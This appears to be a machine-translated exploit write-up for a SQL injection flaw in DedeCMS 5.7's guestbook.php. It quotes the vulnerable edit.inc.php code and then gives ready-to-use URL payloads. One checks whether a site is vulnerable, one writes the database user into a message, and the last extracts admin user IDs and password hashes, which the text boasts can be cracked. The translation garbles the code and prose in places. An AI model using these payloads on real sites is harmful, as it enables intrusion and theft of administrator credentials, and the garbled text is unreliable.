This article is about dedecms5.7 the latest SQL to take advantage of the guestbook.php injection vulnerability, now share to everyone, the need for friends can refer to
Affected version is 5.7
Vulnerability file edit.inc.php specific code:
< PHP if (!defined (' Dedeinc ')) exit (' Request error! '); if (!empty ($_cookie[' Guest_book_pos '))) $GUEST _book_pos = $_cookie[' Guest_book_pos ']; else $GUEST _book_pos = "guestbook.php"; $id = Intval ($id); if (empty ($job)) $job = ' view '; if ($job = = ' del ' && $g _isadmin) {$dsql->executenonequery ("DELETE from ' #@__guestbook ' WHERE id= ' $id '"); ShowMsg ("successfully deleted a message! ", $GUEST _book_pos); Exit (); } else if ($job = = ' Check ' && $g _isadmin) {$dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ischeck=1 wher E id= ' $id '); ShowMsg ("Successful review of a message!") ", $GUEST _book_pos); Exit (); } else if ($job = = ' Editok ') {$remsg = Trim ($remsg); if ($remsg! = ") {//admin reply does not filter HTML By:errorera blog:errs.cc if ($g _isadmin) {$msg =" <p class= ' Rebox ' > ". $msg." </p>\n ". $remsg; $remsg <br/><font color=red> admin reply:</font>} else {$row = $dsql->getone ("Select msg from ' #@__gu Estbook ' WHERE id= ' $id ' "); $oldmsg = "<p class= ' Rebox ' >". Addslashes ($row [' msg ']). " </p>\n "; $remsg = Trimmsg (CN_SUBSTRR ($remsg, 1024), 1); $msg = $oldmsg. $remsg; }}//There is no filtering on $msg, resulting in By:errorera home:www.errs.cc can be injected arbitrarily $dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ' msg ' = ' $msg ', ' posttime ' = ' ". Time ()." ' WHERE id= ' $id '); ShowMsg ("Successful change or reply to a message! ", $GUEST _book_pos); Exit (); }//home:www.errs.cc if ($g _isadmin) {$row = $dsql->getone ("select * from ' #@__guestbook ' WHERE id= ' $id '"); Require_once (dedetemplate. ' /plus/guestbook-admin.htm '); } else {$row = $dsql->getone ("Select Id,title from ' #@__guestbook ' WHERE id= ' $id '"); Require_once (dedetemplate. ' /plus/guestbook-user.htm '); }
Vulnerability success requires conditions:
1. PHP Magic_quotes_gpc=off
2. vulnerability file exists plus/guestbook.php Dede_guestbook Table of course also exists.
How to tell if there is a vulnerability:
First open www.xxx.com/plus/guestbook.php can see other people's message,
Then the mouse on the [reply/edit] can see the ID of someone else's message. Then write down the ID
Access:
www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc ' &id= existing message ID
If it is a dede5.7 version after submission, "successful change or reply to a message" will show that the modification was successful.
Jump back to www.xxx.com/plus/guestbook.php see if you change the message ID has become errs.cc '
If it turns out to be a loophole, it should open PHP Magic_quotes_gpc=off for him.
If there is no successful modification, then the content of the message ID is the previous one to prove that the vulnerability can be exploited.
Then visit again
www.xxx.com/plus/guestbook.php?action=admin&job=editok&id= existing Message id&msg= ', Msg=user (), email= '
Then return, the content of the message ID is directly modified to the MySQL user ().
Probably the use is this, we are interested in more research under!!
Finally, it is estimated that some people will say how to manage the password of the background account, you will know by yourself. Anyway, absolutely can be violent out (can not burst out I will not send)!!
View sourceprint?1/plus/guestbook.php?action=admin&job=editok&id=146&msg= ', msg=@ ', msg= (SelecT CONCAT (userid,0x7c,pwd) from '%23@__admin ' LIMIT 0,1), email= '